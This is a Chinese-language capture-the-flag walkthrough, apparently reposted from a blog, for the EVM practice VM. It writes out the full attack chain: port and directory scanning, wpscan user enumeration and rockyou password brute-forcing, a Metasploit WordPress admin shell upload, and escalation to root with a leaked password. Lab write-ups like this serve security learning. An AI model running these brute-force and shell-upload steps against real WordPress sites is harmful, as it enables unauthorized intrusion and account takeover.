标签：set http EVM 192.168 wordpress 1.107 root

靶机设置

将靶机导入VirtualBox中，有时候导入VM会出错，扫描不到ip地址。

kali：192.168.1.100
kali扫描获得ip地址：192.168.1.107

渗透测试

接着扫描端口

nmap -sS -sV -T5 -A -p- 192.168.1.107

访问80端口

没有什么有用的信息，扫一下目录

./dirsearch.py -u http://192.168.1.107 -e*

扫出info.php

换个工具在扫一波

dirb http://192.168.1.107

扫到wordpress目录，访问一下：

发现使用的是wordpress框架，使用wpscan工具进行扫描

wpscan --url http://192.168.1.107/wordpress -e ap -e at -e u

扫描到一个用户：c0rrupt3d_brain

接着使用此工具爆破密码

wpscan --url http://192.168.1.107/wordpress -U  c0rrupt3d_brain -P /usr/share/wordlists//rockyou.txt

密码为: 24992499
Metasploit有内置wordpress漏洞
启动Metasploit，然后键入以下命令：

msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set rhosts 192.168.1.107
set USERNAME c0rrupt3d_brain
set PassWORD 24992499
set targeturi /wordpress
run

成功了,cd /home

有一个root3r的文件，进入查看

有一个.root_password_ssh.txt文件查看

获得了ssh的密码：willy26
我们知道了root用户的密码好我们提权
我们先建立交互式

shell
python -c 'import pty;pty.spawn("/bin/bash")'
su root
willy26

提权成功
进入root文件夹下获取flag信息

标签：set,http,EVM,192.168,wordpress,1.107,root
来源： https://www.cnblogs.com/zhaohzaomumu/p/15332876.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。